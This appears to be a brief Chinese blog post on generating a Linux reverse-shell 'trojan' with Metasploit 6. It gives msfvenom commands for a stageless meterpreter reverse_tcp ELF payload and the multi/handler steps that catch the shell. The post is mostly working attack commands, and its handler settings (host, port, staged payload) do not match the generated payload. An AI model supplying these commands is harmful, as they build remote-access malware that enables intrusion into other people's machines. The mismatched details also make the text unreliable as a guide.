0x01 前言
这几天我的msf 要生成linux 的木马 一直反弹不成功,用的是以下的paylaod
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.233.131 LPORT=4444 -f elf > mshell.elf
我分析了一下报错,这个报错是没问题的,但生成的木马只有250b ,这明显是不成功的。
0x02 解决问题
我刚开始认为是我msf的问题 ,回来验证了一下,我的msf 是6的版本,而这个语句是5的写法,而我启动 msfconsole ,发现我的版本是6
msf 6的生成语句为
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.3.16 LPORT=4444 -f elf > shell.elf
所以我改了payload :linux/x64/meterpreter_reverse_tcp
这时候,就可以生成成功
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.233.131 LPORT=4444 -f elf > mshell.elf
生成监听
msfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;
use exploit/multi/handler # 监听木马反弹过来的shell
set payload linux/x64/meterpreter/reverse_tcp # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;
set lhost 192.168.100.132 # 我们的kali本机ip
set lport 6666 # 我们的kali本机端口
exploit
反弹成功。